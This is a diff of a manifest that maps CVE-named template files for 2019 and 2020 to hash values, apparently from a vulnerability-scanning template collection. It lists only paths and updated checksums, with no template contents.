http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 http/cves/2019/CVE-2019-10232.yaml:713f169c89ece5300e52e0bc987370371d9b3573 -http/cves/2019/CVE-2019-10405.yaml:8a82ad3b8b1087a5dd21a84315fc0d678ab33b65 +http/cves/2019/CVE-2019-10405.yaml:3adcc10e7de5738a1b174b41c045836422b07eb7 http/cves/2019/CVE-2019-10475.yaml:95b5f0bc9f584b4e7c2c7b39fa2de8560c35c198 http/cves/2019/CVE-2019-10692.yaml:e03cfcc646b10b50f803898d7416ba908c049add -http/cves/2019/CVE-2019-10717.yaml:10f9e51439d926c6194e1d212ddafba6721e5db0 -http/cves/2019/CVE-2019-10758.yaml:901ad37c15d72a42932b0a257e43cd0027716509 +http/cves/2019/CVE-2019-10717.yaml:80b4afcd16cead586430e22779d32172f99ed801 +http/cves/2019/CVE-2019-10758.yaml:49f81d017256cf42fc0b6fa8831127904414ffb0 http/cves/2019/CVE-2019-11013.yaml:2ad66e116c4d085161542c51376f4c68df78c478 -http/cves/2019/CVE-2019-11248.yaml:94f9aa12f2df09ed521b163f16a4c46e3401e111 -http/cves/2019/CVE-2019-11370.yaml:553150d31098410ba431c834b075b4a0788c9264 -http/cves/2019/CVE-2019-11510.yaml:0391926a4fd2eaaedcb51b8dcad38fc2dd0dbb32 -http/cves/2019/CVE-2019-11580.yaml:028fc2d8186c261233f34d98c282009b49a2232f -http/cves/2019/CVE-2019-11581.yaml:7f55d6b6e29961c4aee0ce27d2c303b3de70a20a +http/cves/2019/CVE-2019-11248.yaml:297ea95f36c645ae392c64dc65aaf99a3ce8068b +http/cves/2019/CVE-2019-11370.yaml:132202b3ffa257cef4166a6626380d2c6bea519a +http/cves/2019/CVE-2019-11510.yaml:d2b607d9c89a9b41fa57447b094cfefeb7451cca +http/cves/2019/CVE-2019-11580.yaml:c8d5a8c7f9550ad1a2a9ebf25f645a24bfea0b77 +http/cves/2019/CVE-2019-11581.yaml:de030228264f9631c9ce5f5fbedb2c5a2a7715d8 http/cves/2019/CVE-2019-11869.yaml:223e8fbfc472a62769340c41f0017a013b42fc6d http/cves/2019/CVE-2019-12276.yaml:fb5177e00a08d1ba5ec2ed962b12056e8d3a5fe9 http/cves/2019/CVE-2019-12314.yaml:45e5093a3ac421643dcc25859931c3b6ba9057f6 http/cves/2019/CVE-2019-12461.yaml:e59515dfc19f812aafa8c4b0bdad9c28b65ff574 -http/cves/2019/CVE-2019-12581.yaml:960179d39016c873230ad7dc7337319a3b7b68ae +http/cves/2019/CVE-2019-12581.yaml:4976f8da6fe13e4c03cb2f2506e62d3514f1caf8 http/cves/2019/CVE-2019-12583.yaml:839bb71239abe5bf41aad959223aad3708482b5b -http/cves/2019/CVE-2019-12593.yaml:e59a8d310e2ecb640e39bbfd1d191618c048fd7a -http/cves/2019/CVE-2019-12616.yaml:33806adb06c11a04fd5ed55524da3177d910c92c +http/cves/2019/CVE-2019-12593.yaml:45f42d7bde073d8d5816704a3ae55bb13f23f29f +http/cves/2019/CVE-2019-12616.yaml:53bb4f78becf29072c0d6061584881a0317f946f http/cves/2019/CVE-2019-12725.yaml:eb150ec0f37948a8e69b924d384e5f3f5d8a53a8 -http/cves/2019/CVE-2019-12962.yaml:bf87575fe193dea9289b2f07d453849508d42425 -http/cves/2019/CVE-2019-12985.yaml:f22fea2173efc533fa7656d744bf27a6ec8f68c2 -http/cves/2019/CVE-2019-12986.yaml:bcec4f64aa9287466574468fb7c8616cc19c9c80 -http/cves/2019/CVE-2019-12987.yaml:956df154fa7345e031700b449a1373d638b3cb7d -http/cves/2019/CVE-2019-12988.yaml:2054b6d39fe520abb83cb06b4c2ff5de5d8c4421 -http/cves/2019/CVE-2019-12990.yaml:68d9b094f8ef30ffe40f7b47c0650149b752ad81 +http/cves/2019/CVE-2019-12962.yaml:586ef7731c9c7fe252f5d4c16fcbe8a0614c59b5 +http/cves/2019/CVE-2019-12985.yaml:d88bffd3b338219c549900b5dd1447423594bc99 +http/cves/2019/CVE-2019-12986.yaml:3c5b89b9b4ef45ca93b30c14c185242d9787277a +http/cves/2019/CVE-2019-12987.yaml:840c90ae21a1ad0ef419475eb3009928d69fc697 +http/cves/2019/CVE-2019-12988.yaml:17b83201850f6417df4b4aa2231072d00d1d592a +http/cves/2019/CVE-2019-12990.yaml:ede5711ad54138cfdcc008616cd463e216a4253d http/cves/2019/CVE-2019-13101.yaml:ae9d95abb521c1b79cce351d330dc3b42e84070b http/cves/2019/CVE-2019-13392.yaml:ce2b84675b816ead08f4912d7f894cf7cc7ac516 http/cves/2019/CVE-2019-13396.yaml:cd8a877aba811f643970cfea627a30bc48b29bec @@ -1583,197 +1583,197 @@ http/cves/2019/CVE-2019-14205.yaml:d57f3dd988d8000bb5d2a513d4f51cda75496cd2 http/cves/2019/CVE-2019-14223.yaml:3be945555ecd14072d1bf7d87ef59f0e29c73ddd http/cves/2019/CVE-2019-14251.yaml:2cd3f4fb3bb8ec7706366410a493577aa6ecddf0 http/cves/2019/CVE-2019-14312.yaml:65fa579c20b881c49bd5fbadb68612d6aeea7765 -http/cves/2019/CVE-2019-14322.yaml:9058f60a731d772d1bb4a72506907f3578c0dfd3 -http/cves/2019/CVE-2019-14470.yaml:19ff7668d85695c13252e32bb237696506feebf9 -http/cves/2019/CVE-2019-14530.yaml:e3135f6a3470736b273a9368031e0bf0d585d695 +http/cves/2019/CVE-2019-14322.yaml:492a1d5ebcfac03032ea41e59bd56f5cd7857fb3 +http/cves/2019/CVE-2019-14470.yaml:2121c3082848cb5bdd3eb6dd5457bb8f1700db17 +http/cves/2019/CVE-2019-14530.yaml:39f2fca8f068653ac9203dac1093b1af29a94f0d http/cves/2019/CVE-2019-14696.yaml:8bb0920522198a471f418d5106d40090b74d447f -http/cves/2019/CVE-2019-14750.yaml:1b2ff499c06097cb3f482dcb443ecbd427178023 +http/cves/2019/CVE-2019-14750.yaml:e9fe8e94a5252a8b021fe7757996aac7fc3dfe10 http/cves/2019/CVE-2019-14789.yaml:9abfb241c4372064325299d720740ad9ff35c0cb -http/cves/2019/CVE-2019-14974.yaml:e98792c8f9c711cae7391e17f06f5fb437f0dd33 -http/cves/2019/CVE-2019-15043.yaml:4deb4505cd70a1a8752ca8c8bdb061a1b87876b0 +http/cves/2019/CVE-2019-14974.yaml:4bb789ab760714cf7465a6f9bce473cbd34d472f +http/cves/2019/CVE-2019-15043.yaml:c87c3857e5a71e527cf3000afb169b8936e14f43 http/cves/2019/CVE-2019-15107.yaml:cc948e3dce86ff30d549a30c11561d60446b9ee5 -http/cves/2019/CVE-2019-15501.yaml:e7f26db3c4dee04092c22e76a71ca5d0c7267cc5 -http/cves/2019/CVE-2019-15642.yaml:361482b6de9480a30f106adca9d74bfb34708fc9 -http/cves/2019/CVE-2019-15713.yaml:c530f6f210728ab2c41407c4185e8c82accf97ed +http/cves/2019/CVE-2019-15501.yaml:6e3a730995009f5407294e3efb842eca3d65b387 +http/cves/2019/CVE-2019-15642.yaml:254b2c670da71e323eb1807f3811d420f05951f9 +http/cves/2019/CVE-2019-15713.yaml:da71d72072948f8e8c99cb5afe088ba4ac1a9262 http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:4b9ff0bb1461db5f85312405b47a267021c4f1e2 +http/cves/2019/CVE-2019-15829.yaml:8c26d6ddc7c20c2076831b90c0b7dc4881f69dc6 http/cves/2019/CVE-2019-15858.yaml:dd0e88830d6f0a234634472d109bda9140c02c6a -http/cves/2019/CVE-2019-15859.yaml:3ea85cf262735e5dbb427a42d639d1a407420d38 -http/cves/2019/CVE-2019-15889.yaml:df3eba3207440c9890d767c05152c1ec1bf24ae9 -http/cves/2019/CVE-2019-16057.yaml:2eb03e2bf61a3c36ffb6589d971902e253a39a70 +http/cves/2019/CVE-2019-15859.yaml:782f91b543e494a94d6db2a596ffb8c73e5d495f +http/cves/2019/CVE-2019-15889.yaml:871ef53589cab43447c656b846cc8736bb88a9c5 +http/cves/2019/CVE-2019-16057.yaml:ebf945901c0fef5ef1f30e76b68c52a9a88bfe8e http/cves/2019/CVE-2019-16097.yaml:be89395f00bc61330f2b6483c9295c1d39768fb5 http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 http/cves/2019/CVE-2019-16278.yaml:d4149d9e0cf739bdaac6caec400e0b9fe8be159c http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 -http/cves/2019/CVE-2019-16332.yaml:48a30c9351ec4a9b949690f56d1c5f716317edfd -http/cves/2019/CVE-2019-16469.yaml:850f8e8a77012476e4698c519df222f2cd13dd22 -http/cves/2019/CVE-2019-16525.yaml:a6736e1fee1b9638aa95acb1ec8c377e9263d39f +http/cves/2019/CVE-2019-16332.yaml:803c66e1f6289cbab57cf7ed23db08b636116d55 +http/cves/2019/CVE-2019-16469.yaml:4e6309b872f3e402d041d5e73ea64003d7892b6b +http/cves/2019/CVE-2019-16525.yaml:43bda4e129d89ca1522a34a89da3548935b71ee7 http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce http/cves/2019/CVE-2019-16662.yaml:9229e08486910b48989f08049c83d04a45daf59b -http/cves/2019/CVE-2019-16759.yaml:abfaca39d9355ef9270704b245d94e03abd2d4fa +http/cves/2019/CVE-2019-16759.yaml:3f489a982d0815ce65cd3c17bf94577cdd9ec746 http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 http/cves/2019/CVE-2019-16931.yaml:c4ce5984023bdfde781c4fa8b19a8b782f2c9e09 -http/cves/2019/CVE-2019-16932.yaml:9c91bdae5079d0df293ae7225d5af62b9de5ae57 +http/cves/2019/CVE-2019-16932.yaml:8d416a4dcc1a3bb71289e70892341096631d3005 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac http/cves/2019/CVE-2019-16997.yaml:b7e350a4629c6352013831586ca26ecb0020851f http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:d60ed21681f722c8f54de41cc380d1e26909567a +http/cves/2019/CVE-2019-17382.yaml:96c0c183801aec1b5149354e8a91bf33d68f99d2 http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 http/cves/2019/CVE-2019-17444.yaml:fe7925cc25fd290827df56c3772006ff4f4daa72 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d http/cves/2019/CVE-2019-17538.yaml:e427655cb8a73e608adee628c3ca459b713921ee -http/cves/2019/CVE-2019-17558.yaml:1d2870833ce822d2056ec6a07e9b8c928181983b -http/cves/2019/CVE-2019-17574.yaml:499a7706a78fae17b74407fa7bafa07cd5f9b5e8 +http/cves/2019/CVE-2019-17558.yaml:fd1584be9bf9a922c1f7e0a789615a1d5fbe5937 +http/cves/2019/CVE-2019-17574.yaml:a9e0a1748ee66cb1dd2260708bb4750150054956 http/cves/2019/CVE-2019-17662.yaml:8e6fedc5549df29f3f224e263ef72013c5672dbd http/cves/2019/CVE-2019-1821.yaml:4325f02bbf036da272e74d6c0bd97165d27bfe47 http/cves/2019/CVE-2019-18371.yaml:fec092d5d3baa9fdd72fa9d57474ff90a3bbfa37 -http/cves/2019/CVE-2019-18393.yaml:275a79b64223d7e71595ab2f89da5aa775aad319 -http/cves/2019/CVE-2019-18394.yaml:a92c96c33dfcefdeebfc04b357450920588cb314 +http/cves/2019/CVE-2019-18393.yaml:397c44fa58d873550e01a7032d973f8b9cd0a418 +http/cves/2019/CVE-2019-18394.yaml:295a79ebc2c9fea48b9d570d58e653996b559f64 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 -http/cves/2019/CVE-2019-18922.yaml:32c671c6ddfc6f344de73bef9fb95705a7ddc0a9 +http/cves/2019/CVE-2019-18922.yaml:2d70eda04ca88836a24995e94be3cb20c03873f3 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:a52c9d3385418512bf7e3a62fb891871aae9875b -http/cves/2019/CVE-2019-19134.yaml:e067b4333933ad2cba0f118f599bbbcd25c207c8 +http/cves/2019/CVE-2019-1898.yaml:db88248b4f9c621e7dbcc02d55a9bde8a71b0cbe +http/cves/2019/CVE-2019-19134.yaml:76f38dba34e5a6026f1d5b94b528d1656d14d098 http/cves/2019/CVE-2019-19368.yaml:c6ca0ce8b465ba621c9953b40ce5cf83f5e4d90a -http/cves/2019/CVE-2019-1943.yaml:c90bd6205f20779491cbe48b3bcdae2297aaebcb +http/cves/2019/CVE-2019-1943.yaml:3e182e5782882260a40a99b235fd6ae9ea791452 http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a http/cves/2019/CVE-2019-20085.yaml:7a89305d4926c92ba6536f6fff5a2f6eb2eecf77 http/cves/2019/CVE-2019-20141.yaml:a35d73a26d4304223e7f62e87791e663a12e069a -http/cves/2019/CVE-2019-20183.yaml:0475273b61996c7834c64266235f51589dfde923 +http/cves/2019/CVE-2019-20183.yaml:00fa1564984efafe747ebcd7073037e276bc4904 http/cves/2019/CVE-2019-20210.yaml:423485155c1d5ad2f94ce866e2a2d9738d7eb701 http/cves/2019/CVE-2019-20224.yaml:d4627b2f43c8bd7e4417435f435f678196e8ea83 -http/cves/2019/CVE-2019-20933.yaml:9dc3328a7fa1bc1601b2e6f659fcf62964a3acc0 +http/cves/2019/CVE-2019-20933.yaml:eda49f3d8081e0e0dd8ee8deafd828bc9172dc47 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd http/cves/2019/CVE-2019-2616.yaml:49771e4c9de01bd8e36ce88a50a5d707dda27c66 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c http/cves/2019/CVE-2019-2729.yaml:222af28a1803c75b198281d8150ae8e6eeb863e9 -http/cves/2019/CVE-2019-2767.yaml:e7fdda3b37c5eb3f8140fe956f8cea10fb1d76f2 -http/cves/2019/CVE-2019-3396.yaml:85d418e9b2bee0dade0070adf1bfb9bb14cce3ea -http/cves/2019/CVE-2019-3398.yaml:5fdebac063f09dfac0e6cea08eb817841e243bcb -http/cves/2019/CVE-2019-3401.yaml:184fcf9901a21e0aa31c81511950f045fa44b4fa -http/cves/2019/CVE-2019-3402.yaml:704b1e62bac15cf36c484aea356cf95b5f41484e -http/cves/2019/CVE-2019-3403.yaml:7347c24e1d80a177ae555b9b31541558d1a515cd +http/cves/2019/CVE-2019-2767.yaml:d43080d723a6b4f6352922ca3826d92c2855e9ff +http/cves/2019/CVE-2019-3396.yaml:84ac2c106f6951cd885e18f69d807a3a1d6a7ee5 +http/cves/2019/CVE-2019-3398.yaml:58f82424948e91476c4784e3ffb09183c019bcfe +http/cves/2019/CVE-2019-3401.yaml:ed435a87c1b9d402a59c36e6eb4a29c380823107 +http/cves/2019/CVE-2019-3402.yaml:8f3e062c811dae98e0bdfead569352d365d43ea2 +http/cves/2019/CVE-2019-3403.yaml:2179ceba6185ab08744d5a42bd928c9127369c9c http/cves/2019/CVE-2019-3799.yaml:b50992af94bf8f2b667b253029d6e978c184686a -http/cves/2019/CVE-2019-3911.yaml:6242246a29e0eb20cac54340c68e61c3d9d9e7ec -http/cves/2019/CVE-2019-3912.yaml:1dd70dedfce606d51d2760a06019f39ed08a995e +http/cves/2019/CVE-2019-3911.yaml:8748227da5f9601dcbec3c4667091d6834407d17 +http/cves/2019/CVE-2019-3912.yaml:38f2c4d78bc5b02c7be2c34fc8321c0e330486bd http/cves/2019/CVE-2019-3929.yaml:9de8f3f7312bd0b5525ba41b71ddffeb6dc193bf http/cves/2019/CVE-2019-5127.yaml:a18cf67b04c44e210d6fc33343dd77820fc1555b -http/cves/2019/CVE-2019-5418.yaml:0f853f229ae869832fbe23a33a0cd4c8dd9295ce -http/cves/2019/CVE-2019-5434.yaml:48e0b91b298a4d62cbfca1e3d7a625bbca5b409e +http/cves/2019/CVE-2019-5418.yaml:8aceb52b696bda123101ee876327ca142e91e238 +http/cves/2019/CVE-2019-5434.yaml:a1ace5058e562bb13ccfa7dd8a69c8abdcc6362f http/cves/2019/CVE-2019-6112.yaml:d009c3b8cc6cdb705307890c9ec89513170694d8 -http/cves/2019/CVE-2019-6340.yaml:079d32432763fc4f16999d32225034ea113792d8 +http/cves/2019/CVE-2019-6340.yaml:579b3ac2d69aab2fc2e9d65d18c010bfd5b9e9dc http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e -http/cves/2019/CVE-2019-6799.yaml:c797d51c9e31f131e6195de09c5eff0f337c9d12 -http/cves/2019/CVE-2019-6802.yaml:766bcc20164c341f38cef37e10e7190286349368 -http/cves/2019/CVE-2019-7139.yaml:2694244ec9f34c68a877186b2c3eb9edcf48e764 -http/cves/2019/CVE-2019-7192.yaml:47efc5c532e8e185900dbae350d30c4d0b70427a +http/cves/2019/CVE-2019-6799.yaml:b203bd17d30b9d7e352ceca21844491e6f33dea6 +http/cves/2019/CVE-2019-6802.yaml:ded913b5a2ab640125f6e866e8b731d04c8b47a4 +http/cves/2019/CVE-2019-7139.yaml:906c9b2571a38b91b52cc59aa12ffd78d05232ed +http/cves/2019/CVE-2019-7192.yaml:666b80bc55b3a523dcfcbdd3b31e22d53888a6f3 http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca -http/cves/2019/CVE-2019-7254.yaml:ce982df8b2ba519921e2f3e175b0b5d1fe334379 -http/cves/2019/CVE-2019-7255.yaml:d07ccc6177536230ee73d422525433676603588a -http/cves/2019/CVE-2019-7256.yaml:6e0fa5602a538ad7d4e010a92af55b49da04a590 +http/cves/2019/CVE-2019-7254.yaml:6a112732d04b1f695842f43301eff70e7945c434 +http/cves/2019/CVE-2019-7255.yaml:614577645822d0f5b48faa4bfa06be666c555811 +http/cves/2019/CVE-2019-7256.yaml:7d8d9565355c592e150bf580bd7edf84e513273e http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 http/cves/2019/CVE-2019-7315.yaml:aef603a42e387838d30064359e8f376292d8c488 -http/cves/2019/CVE-2019-7481.yaml:2ea1b058d51f439f3d2fb43df75aeb85929ca738 +http/cves/2019/CVE-2019-7481.yaml:897d2446bf43439252ad9799ba1327d567b7d61e http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a http/cves/2019/CVE-2019-7609.yaml:429a7deb4d729e22c14cd66db90f7cbad01564f0 -http/cves/2019/CVE-2019-8086.yaml:e06bff8d3d335370a1b5ffd8c64dd0c144447f49 +http/cves/2019/CVE-2019-8086.yaml:e67272e4951348d4428424fa10151d23e5ca9dc4 http/cves/2019/CVE-2019-8390.yaml:b18016f9d895afdb0c2dc81ff8ac484b845f0caf -http/cves/2019/CVE-2019-8442.yaml:478eb203c8c14804d4ac9d7995ca162ab96e9d9d -http/cves/2019/CVE-2019-8446.yaml:1a36a151cee74fac964a82aaef0fd54e5e28be28 -http/cves/2019/CVE-2019-8449.yaml:8b8b01f595b9589b8d72e05463e8de2ea9710943 -http/cves/2019/CVE-2019-8451.yaml:706ff06da35369205762fb3058ff5ebef1bc5641 -http/cves/2019/CVE-2019-8903.yaml:22f8df41b441ff54035d803ba5ff18fb325d758f -http/cves/2019/CVE-2019-8937.yaml:20e197326287893df3caffeb30d577056726fd51 +http/cves/2019/CVE-2019-8442.yaml:a6bcaab0bfc1c604be09aebf0b4ed494582e8308 +http/cves/2019/CVE-2019-8446.yaml:11e7405631fd5cbe8ab31bb67e55a5565ba9c4ec +http/cves/2019/CVE-2019-8449.yaml:69ef436d46114ef7e070ffd27dd7377beb63283e +http/cves/2019/CVE-2019-8451.yaml:d705ae9c1fb2acbe661a2a248d8eb12df85eb145 +http/cves/2019/CVE-2019-8903.yaml:7adc8c8a30e6fab0ba291634bce00288cdce6dab +http/cves/2019/CVE-2019-8937.yaml:e526354a0e0c4fefc7a1a1f0515ba61667f63774 http/cves/2019/CVE-2019-8982.yaml:d345b49353e77db87682e091eba0c1668e5a374f http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c http/cves/2019/CVE-2019-9618.yaml:d1d4515fdd132e8704aa3ad89f97f9a3840d2503 -http/cves/2019/CVE-2019-9632.yaml:02602f031e8743db5dfb75e665c44634d83d0709 -http/cves/2019/CVE-2019-9670.yaml:fe6cb7b1f07545677c4107d26c9ffb779e99cbfe +http/cves/2019/CVE-2019-9632.yaml:a965a6279909e7896c4e180c77ada361785aa56e +http/cves/2019/CVE-2019-9670.yaml:587965e434488e267c276ea77fd48b566fcc6149 http/cves/2019/CVE-2019-9726.yaml:dc39e85dbbe5056aae9925c7a68be4767ff3992c http/cves/2019/CVE-2019-9733.yaml:2caf78cb597139c1a3db12a011f7f9ba6e94ac68 http/cves/2019/CVE-2019-9915.yaml:939eceb6822e8651b5daaf3085bdcc1d35e434d6 http/cves/2019/CVE-2019-9922.yaml:6c85785266eba7189ac1457d23b0473f33cf9440 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 -http/cves/2019/CVE-2019-9978.yaml:d1db71fee79ff1f91a2fce54d373dc5f869b0dd1 +http/cves/2019/CVE-2019-9978.yaml:ebc3ac73c1bc381c952a6d283b524b7defc38a77 http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 -http/cves/2020/CVE-2020-10148.yaml:5e1d5f205bebdf43f0dc8a3b08f1040306c3820d +http/cves/2020/CVE-2020-10148.yaml:d43a17911b224fa2d73eb14d13f55b78f9f11e28 http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 -http/cves/2020/CVE-2020-10220.yaml:d7d6bdbb881296ba829db6c5ab88292bda2801e8 +http/cves/2020/CVE-2020-10220.yaml:5943d426d223a9162b34d7a51569878e7fbc92f8 http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc http/cves/2020/CVE-2020-10547.yaml:153c1b664b9491f7fcbc530feba3ba406b13deb0 -http/cves/2020/CVE-2020-10548.yaml:1ca076762ecdfb68722bd82fe70de9a37290f805 +http/cves/2020/CVE-2020-10548.yaml:793e2a70fd3b33011ff3651bfe0de2fc00612f28 http/cves/2020/CVE-2020-10549.yaml:7ff911d067ec6f0bde4ba6edfb5b609001870243 -http/cves/2020/CVE-2020-10770.yaml:1510723af2d7bf6f8ea46a2ed1f1897a7bb35bbd -http/cves/2020/CVE-2020-10973.yaml:91c309859a6100f36677ad1faa7dcd44c7f0a80b -http/cves/2020/CVE-2020-11034.yaml:64a6a2b1401ef5e6826449f64e51e6bdd724f1a9 -http/cves/2020/CVE-2020-11110.yaml:4bee93e2b1ef0d5d8187adea946cb1b2f0f77a75 +http/cves/2020/CVE-2020-10770.yaml:060b9c3f89be6ad5bf34df6b98bd9a3b3f6a5b18 +http/cves/2020/CVE-2020-10973.yaml:afd40f90f35c0fec37ab465c3f1c9f73388e9410 +http/cves/2020/CVE-2020-11034.yaml:f6b016c179207b56c614dc90e235797b70d9195d +http/cves/2020/CVE-2020-11110.yaml:729f150a1b3bb388f1eb94050a8de31184e31798 http/cves/2020/CVE-2020-11450.yaml:09220519d0db5db7c2a93fc06f80c6dae4f839ea http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:80c9a47fde950d0a147cd5759e76fb36f9ddf865 -http/cves/2020/CVE-2020-11546.yaml:4e71f1f66429ee58c8fe34c2bac3b1a03b25a98c -http/cves/2020/CVE-2020-11547.yaml:ffc1acf2e4ae8224e43441763456ff257e6ea530 +http/cves/2020/CVE-2020-11546.yaml:809df1e504319c19c3881dc5f465a611661993b8 +http/cves/2020/CVE-2020-11547.yaml:a49d73b75b29a9582c172fc3ee5aa20c32778eac http/cves/2020/CVE-2020-11710.yaml:328459cf74b245b08f305b4da5b937778d78e9bd http/cves/2020/CVE-2020-11738.yaml:26bc4a13b4dc75ef0ff4c86b0551736ad7ab0953 -http/cves/2020/CVE-2020-11798.yaml:6b948b01867198571682067a8b3371c78005206e +http/cves/2020/CVE-2020-11798.yaml:892474cba1404448c14e641cfaaca878221566c0 http/cves/2020/CVE-2020-11853.yaml:d688b8bf64d257892f84464396a6a1b56df47ddd http/cves/2020/CVE-2020-11854.yaml:5b340b27bcee9e4e2a7bee5aa5e6849caabfbcdd -http/cves/2020/CVE-2020-11930.yaml:1a728e85f4d61b33bfb23dc5980fa2507ce87b2d -http/cves/2020/CVE-2020-11978.yaml:cad582b4036a6df51fcc561cfecd7db9a9442f59 -http/cves/2020/CVE-2020-11991.yaml:94da65cc79b05554185653e3f75a1cdb4fb8e374 +http/cves/2020/CVE-2020-11930.yaml:57c8401b56d63ab4420cd8e31ec5bb99be4ebd28 +http/cves/2020/CVE-2020-11978.yaml:b39b72c535fafb1a2ceadbcc79055d33dc97bee2 +http/cves/2020/CVE-2020-11991.yaml:c1b192447d144b1a0f278492400980d18ec66148 http/cves/2020/CVE-2020-12054.yaml:ccce337032ce9b12fe10efc5dcc4ca9b081e6ae9 http/cves/2020/CVE-2020-12116.yaml:996d7d30601cb3ab87713f51cb15b93d59f28a74 http/cves/2020/CVE-2020-12124.yaml:c60dc6e91d9b585c32fa85b3fa435122369080e9 -http/cves/2020/CVE-2020-12127.yaml:6aa88d338e060fd4e33efa8399b364dae2f83eb5 -http/cves/2020/CVE-2020-12256.yaml:64874ffe435cb495873609acac32b605e8ff4eb5 -http/cves/2020/CVE-2020-12259.yaml:aa74ee196be1180fa2550ca01f7765c8bd076660 +http/cves/2020/CVE-2020-12127.yaml:719d9cda6a9e70450b906acab3b28884a03e9515 +http/cves/2020/CVE-2020-12256.yaml:1c3df3bbf26e1a07dbcba86806ded2a3c434e804 +http/cves/2020/CVE-2020-12259.yaml:d44c1199599dd06ba3941289e7186f5977fa6093 http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 -http/cves/2020/CVE-2020-12720.yaml:c5c91d7325a1a7eb6014c07cde1d5c5bb0b14d6b +http/cves/2020/CVE-2020-12720.yaml:60582b2b99d2498df400db358a628940fc8ced02 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 http/cves/2020/CVE-2020-13121.yaml:93e5a3ab99c0ba9e334c2e082b4d38fb250b69ac http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 -http/cves/2020/CVE-2020-13379.yaml:2820dbaa66121c7e3c6115760e9fb75588fa6003 -http/cves/2020/CVE-2020-13405.yaml:0ba40701113be721e9cca6b5b42c9a3c97e698b9 +http/cves/2020/CVE-2020-13379.yaml:f6c32418f029b9ff98bfc60b73edfdd7501fb633 +http/cves/2020/CVE-2020-13405.yaml:066f753d477fe4a469bc747dee41297d9a326586 http/cves/2020/CVE-2020-13483.yaml:32a74a6fa8b6e7d0be4e1dd3ba8e4ece9b9c8690 -http/cves/2020/CVE-2020-13638.yaml:48aa4df4ae54bc69916fdf286abcbb6da317ab63 -http/cves/2020/CVE-2020-13700.yaml:573ab040755ea90fab3532427a607dacc48f1cec -http/cves/2020/CVE-2020-13820.yaml:9ead5e8c55f1677640032c495aba8b97f1520c5c -http/cves/2020/CVE-2020-13851.yaml:b0aaa611cf376803194425f64d1194997a6679a9 -http/cves/2020/CVE-2020-13927.yaml:1aa87ed72734899bc9f7d8da3cd672b314ab50cb +http/cves/2020/CVE-2020-13638.yaml:8d1eabb5be92bcdc7f20d7d8f41eaf8a43662223 +http/cves/2020/CVE-2020-13700.yaml:8a3897518b67e8a81e6368fb15d0a24146ccfc28 +http/cves/2020/CVE-2020-13820.yaml:cf65781a36f3321f0400d14a08690ddd083bc816 +http/cves/2020/CVE-2020-13851.yaml:ce72b50b487ae2af58e9a1416c31c23033b52762 